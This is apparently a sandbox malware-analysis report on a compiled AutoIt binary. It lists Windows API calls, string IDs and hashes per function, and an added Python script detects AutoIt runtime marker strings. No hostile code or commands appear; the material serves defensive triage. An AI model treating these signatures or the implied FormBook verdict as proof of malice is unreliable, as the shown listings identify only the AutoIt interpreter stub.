                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: bef45903632165b2514003dd51a046c191912f336e9d89d50f471d4feef8b29d
                                                        • Instruction ID: ab10c91078bb02894f76913b05acd758439bb34a772c60b36785219c363003d0
                                                        • Opcode Fuzzy Hash: bef45903632165b2514003dd51a046c191912f336e9d89d50f471d4feef8b29d
                                                        • Instruction Fuzzy Hash: ECE193B4901208AFDF20DF55CC84EEE7BB9EF06710F11815AF915AB2A1DB709A85DF60
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 001449CA
                                                        • GetDesktopWindow.USER32 ref: 001449DF
                                                        • GetWindowRect.USER32(00000000), ref: 001449E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00144A48
                                                        • DestroyWindow.USER32(?), ref: 00144A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00144A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00144ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00144AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00144AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00144B09
                                                        • IsWindowVisible.USER32(?), ref: 00144B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00144B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00144B58
                                                        • GetWindowRect.USER32(?,?), ref: 00144B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00144B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00144BB0
                                                        • CopyRect.USER32(?,?), ref: 00144BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00144C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: f22482149e54a48a95631297a99043c51ed79d08b10f619d7f1a69575e8484ef
                                                        • Instruction ID: 214e1d7a9895d21b1b6cdff663496011d597aa3616a26496990f1577c94ac8bf
                                                        • Opcode Fuzzy Hash: f22482149e54a48a95631297a99043c51ed79d08b10f619d7f1a69575e8484ef
                                                        • Instruction Fuzzy Hash: 44B17A71604340AFDB04DF64C889B6ABBE4FF89714F00891CF99A9B2A1DB71EC45CB95
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001244AC
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001244D2
                                                        • _wcscpy.LIBCMT ref: 00124500
                                                        • _wcscmp.LIBCMT ref: 0012450B
                                                        • _wcscat.LIBCMT ref: 00124521
                                                        • _wcsstr.LIBCMT ref: 0012452C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00124548
                                                        • _wcscat.LIBCMT ref: 00124591
                                                        • _wcscat.LIBCMT ref: 00124598
                                                        • _wcsncpy.LIBCMT ref: 001245C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 47106ea3ba6ba474ea4f3eb3a039f84285a38cc69f40bce7a76693718e57e70c
                                                        • Instruction ID: 944cab6d9031996f1ed96edb504b98b0dce5a649d72d69f76f9b909258aebe00
                                                        • Opcode Fuzzy Hash: 47106ea3ba6ba474ea4f3eb3a039f84285a38cc69f40bce7a76693718e57e70c
                                                        • Instruction Fuzzy Hash: BA41E132A402517FEB14AB759C07FFF77ACDF42710F10406AF905B6293EB74AA1186A5
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000C28BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 000C28C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000C28EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 000C28F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 000C291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000C2939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000C2949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000C297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000C2990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 000C29AE
                                                        • GetStockObject.GDI32(00000011), ref: 000C29CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 000C29D5
                                                          • Part of subcall function 000C2344: GetCursorPos.USER32(?), ref: 000C2357
                                                          • Part of subcall function 000C2344: ScreenToClient.USER32(001857B0,?), ref: 000C2374
                                                          • Part of subcall function 000C2344: GetAsyncKeyState.USER32(00000001), ref: 000C2399
                                                          • Part of subcall function 000C2344: GetAsyncKeyState.USER32(00000002), ref: 000C23A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,000C1256), ref: 000C29FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 76a54c79423480633162cb9239de531aa46fd9cd41d49b89e2057e413df92270
                                                        • Instruction ID: ba84358f77ca6b5b70c8bc4510f689d07c57a0e5e32b76d59a9441ae749a9e05
                                                        • Opcode Fuzzy Hash: 76a54c79423480633162cb9239de531aa46fd9cd41d49b89e2057e413df92270
                                                        • Instruction Fuzzy Hash: CEB19E75A0020AEFDB14DFA8CD45FAE7BB5FB09310F104229FA15E76A0DB74A991CB50
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0011A47A
                                                        • __swprintf.LIBCMT ref: 0011A51B
                                                        • _wcscmp.LIBCMT ref: 0011A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0011A583
                                                        • _wcscmp.LIBCMT ref: 0011A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0011A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0011A648
                                                        • GetWindowRect.USER32(?,?), ref: 0011A67E
                                                        • GetParent.USER32(?), ref: 0011A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0011A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0011A71D
                                                        • _wcscmp.LIBCMT ref: 0011A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0011A757
                                                        • _wcscmp.LIBCMT ref: 0011A76B
                                                          • Part of subcall function 000E362C: _iswctype.LIBCMT ref: 000E3634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: a851837a1af2b284f6ac8c5ba2f4cd7be9e40e601efe0f426bc8cf276b3d2e51
                                                        • Instruction ID: b45c131485a8abd15bada1ed777c169e40795ffc1c873d6cdb0e49943894a247
                                                        • Opcode Fuzzy Hash: a851837a1af2b284f6ac8c5ba2f4cd7be9e40e601efe0f426bc8cf276b3d2e51
                                                        • Instruction Fuzzy Hash: 24A1D171205606AFD719DF60C884FEABBE8FF44310F448539F999D2191DB30EA96CB92
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0011AF18
                                                        • _wcscmp.LIBCMT ref: 0011AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0011AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0011AF6E
                                                        • _wcscmp.LIBCMT ref: 0011AF8C
                                                        • _wcsstr.LIBCMT ref: 0011AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0011AFD5
                                                        • _wcscmp.LIBCMT ref: 0011AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0011B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0011B055
                                                        • _wcscmp.LIBCMT ref: 0011B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0011B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0011B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 2417b88634491945b7e00249f18d00a990b12a68c4df6805cf8d86c893a46617
                                                        • Instruction ID: 3c3f2adfe535d30d1f4d302424da2f06f428afabc71c32813b915c76f3cc41b6
                                                        • Opcode Fuzzy Hash: 2417b88634491945b7e00249f18d00a990b12a68c4df6805cf8d86c893a46617
                                                        • Instruction Fuzzy Hash: DD818071108206AFDB09DF11D885FEA7BE8EF44314F04847AFD899A1A6DB34DD86CB61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 1c7beec78097e7fe1c851af3d88c6d594d221e992eb7fb5763c2dfbaac3815f0
                                                        • Instruction ID: 5a9c164f4ecfe4645951d5523d82eec3cb971648ff467164cbdb5dcea4b29b26
                                                        • Opcode Fuzzy Hash: 1c7beec78097e7fe1c851af3d88c6d594d221e992eb7fb5763c2dfbaac3815f0
                                                        • Instruction Fuzzy Hash: 9E31A431A48209ABEA18FB64DE03FEEBB749F10711F644439F449720D2EF616F448A92
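The two entries above, the CreateWindowExW call that registers the "AutoIt v3 GUI" window and the function that parses the AutoIt window-title prefixes ([CLASS:, [HANDLE:, [REGEXPTITLE:), are the runtime strings that corroborate the "compiled AutoIt script" verdict. The following is an added triage check and is not part of the Joe Sandbox report nor code from the AutoIt project: it scans an image for those strings encoded UTF-16LE (the report lists the wide *W API calls, so the runtime is a Unicode build) and returns the offset of each hit. The marker list is assembled from the strings on this page; `build_sample` constructs stand-in bytes for illustration and is not data from this sample.

```python
import re
import sys
from typing import Dict, List

# Strings the report attributes to this sample's AutoIt runtime: the GUI
# window class name and the window-title matching prefixes. Constructed
# list; these are the only markers the scan looks for.
AUTOIT_MARKERS = (
    "AutoIt v3 GUI",
    "[CLASS:",
    "[HANDLE:",
    "[REGEXPTITLE:",
    "@GUI_DRAGFILE",
    "@GUI_DROPID",
)


def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Return, per marker, the byte offsets where it occurs in `data`.

    The runtime is a Unicode build (the report shows GetClassNameW,
    CreateWindowExW, ...), so the strings are stored UTF-16LE. An ASCII
    match is recorded as well so a narrow-string build is not missed.
    """
    hits: Dict[str, List[int]] = {}
    for marker in AUTOIT_MARKERS:
        offsets: List[int] = []
        for encoded in (marker.encode("utf-16-le"), marker.encode("ascii")):
            offsets.extend(m.start() for m in re.finditer(re.escape(encoded), data))
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def is_likely_autoit(data: bytes, min_markers: int = 3) -> bool:
    """True when at least `min_markers` distinct markers are present.

    This identifies the AutoIt interpreter stub, which benign compiled
    AutoIt tools share; it says nothing about the embedded script.
    """
    return len(find_markers(data)) >= min_markers


def build_sample() -> bytes:
    """Constructed stand-in for a PE image: sequential filler bytes with four
    of the report's strings embedded UTF-16LE and NUL-terminated, the way
    the runtime stores them. Not bytes from the analysed file."""
    filler = bytes(range(256)) * 4  # 1024 bytes, contains no marker
    parts = [b"MZ" + filler]
    for text in ("AutoIt v3 GUI", "[CLASS:", "[REGEXPTITLE:", "@GUI_DRAGFILE"):
        parts.append(text.encode("utf-16-le") + b"\x00\x00" + filler)
    return b"".join(parts)


if __name__ == "__main__":
    # Usage: python autoit_markers.py <file>   (no argument: scan the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for marker, offsets in find_markers(blob).items():
        print(f"{marker!r}: {[hex(o) for o in offsets]}")
    print("likely AutoIt stub:", is_likely_autoit(blob))
```

A hit set only shows that the AutoIt interpreter stub is present, which every compiled AutoIt binary carries, malicious or not; the embedded script and the FormBook stages the report describes elsewhere are not examined by this check, so treat it as corroboration of the packaging, not of the verdict.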
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00135013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0013501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00135029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00135034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0013503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0013504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00135055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00135060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0013506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00135076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00135081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0013508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00135097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 001350A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 001350AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 001350B8
                                                        • GetCursorInfo.USER32(?), ref: 001350C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: 37c8ec942ee752d2bbc5379f22b60f16e5dd912ae3136ae91b0fc8a79d528ce0
                                                        • Instruction ID: ca5a7376f6e47e9f359c9c7ca991668beb0adde33de6044128a0a75eddf301f1
                                                        • Opcode Fuzzy Hash: 37c8ec942ee752d2bbc5379f22b60f16e5dd912ae3136ae91b0fc8a79d528ce0
                                                        • Instruction Fuzzy Hash: E53115B1D083196ADF109FB68C8999FBFE9FF04750F50452AE50CE7280DB7965048FA1
                                                        APIs
                                                        • _memset.LIBCMT ref: 0014A259
                                                        • DestroyWindow.USER32(?,?), ref: 0014A2D3
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0014A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0014A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0014A382
                                                        • DestroyWindow.USER32(00000000), ref: 0014A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 0014A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0014A3F4
                                                        • GetDesktopWindow.USER32 ref: 0014A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0014A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0014A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0014A444
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: 7101fd946f845534e450ac00670f5b7b98be699e3a4228981cd4c591bc2e7c4c
                                                        • Instruction ID: 3802c9ab8c0e48b9561cad7d20aabb6f14fcf224cb18d73a9a69e2ef59f13b8c
                                                        • Opcode Fuzzy Hash: 7101fd946f845534e450ac00670f5b7b98be699e3a4228981cd4c591bc2e7c4c
                                                        • Instruction Fuzzy Hash: 92718C74180205AFD725CF28CC49FAA7BEAFB89304F49452DF985972B1D770E942CB52
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0014C627
                                                          • Part of subcall function 0014AB37: ClientToScreen.USER32(?,?), ref: 0014AB60
                                                          • Part of subcall function 0014AB37: GetWindowRect.USER32(?,?), ref: 0014ABD6
                                                          • Part of subcall function 0014AB37: PtInRect.USER32(?,?,0014C014), ref: 0014ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0014C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0014C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0014C6BE
                                                        • _wcscat.LIBCMT ref: 0014C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0014C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0014C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0014C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0014C757
                                                        • DragFinish.SHELL32(?), ref: 0014C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0014C851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-3440237614
                                                        • Opcode ID: 0f1f9b547477cd1804f844f66896287a5fc3a732c4ac04b5099e9d02f09a02e0
                                                        • Instruction ID: 1ba16af9dc943d4d2390f3563f4714fc5cc6e82dabb6cf920e6cad8a004ea915
                                                        • Opcode Fuzzy Hash: 0f1f9b547477cd1804f844f66896287a5fc3a732c4ac04b5099e9d02f09a02e0
                                                        • Instruction Fuzzy Hash: 3A613871108301AFC701EF64DC85EAFBBE9EF89750F00492EF595962B1DB709A49CB92
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00144424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0014446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 4855f1a8fe0e5d8a74af56c99834d71481f2ed4bf46d9c518c472f6b5d8aff4c
                                                        • Instruction ID: 0f9496ed90d10757782cc5b977ef8f1857c35cd4193fd33d004ab79df5d21173
                                                        • Opcode Fuzzy Hash: 4855f1a8fe0e5d8a74af56c99834d71481f2ed4bf46d9c518c472f6b5d8aff4c
                                                        • Instruction Fuzzy Hash: 2C916D752047019FCB08EF10C455BAEB7A1AF95754F05886CF8966B3A3CB31ED8ACB91
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0014B8B4
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001491C2), ref: 0014B910
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0014B949
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0014B98C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0014B9C3
                                                        • FreeLibrary.KERNEL32(?), ref: 0014B9CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0014B9DF
                                                        • DestroyIcon.USER32(?,?,?,?,?,001491C2), ref: 0014B9EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0014BA0B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0014BA17
                                                          • Part of subcall function 000E2EFD: __wcsicmp_l.LIBCMT ref: 000E2F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: 4b93c9249d439afedab4fbe8bcdaff249188fad39d4463768388cf3c1eecbef0
                                                        • Instruction ID: c559f224238c60fc87ce66de3def53e745f77e44583b28ad6326485baabb901b
                                                        • Opcode Fuzzy Hash: 4b93c9249d439afedab4fbe8bcdaff249188fad39d4463768388cf3c1eecbef0
